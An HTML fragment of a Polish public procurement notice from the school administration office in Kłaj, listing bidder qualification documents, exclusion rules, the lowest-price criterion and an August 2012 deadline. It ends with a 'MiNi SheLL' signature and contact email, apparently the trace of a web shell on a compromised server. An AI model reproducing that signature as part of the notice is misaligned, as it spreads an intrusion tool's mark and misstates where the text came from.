<ul class="kh_indent_1"><li><p>wykaz nie mniej niż trzech dostaw odpowiadających swoinm rodzajem przedmiotowi zamówienia, o wartości minimum 50 000 zł, wykonanych w ciągu ostatnich trzech lat wraz z potwierdzeniem ich należytego wykonania</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonanwcy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie Wykonawcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.klaj.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Zespól Ekonomiczno-Administracyjny Szkól w Kłaju, 32-015 Kłaj 652.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2012 godzina 15:00, miejsce: Gminny Zespól Ekonomiczno-Administracyjny Szkól w Kłaju, 32-015 Kłaj 652.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zamówienie realizowane w ramach projektu finansowanego ze środków UE.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com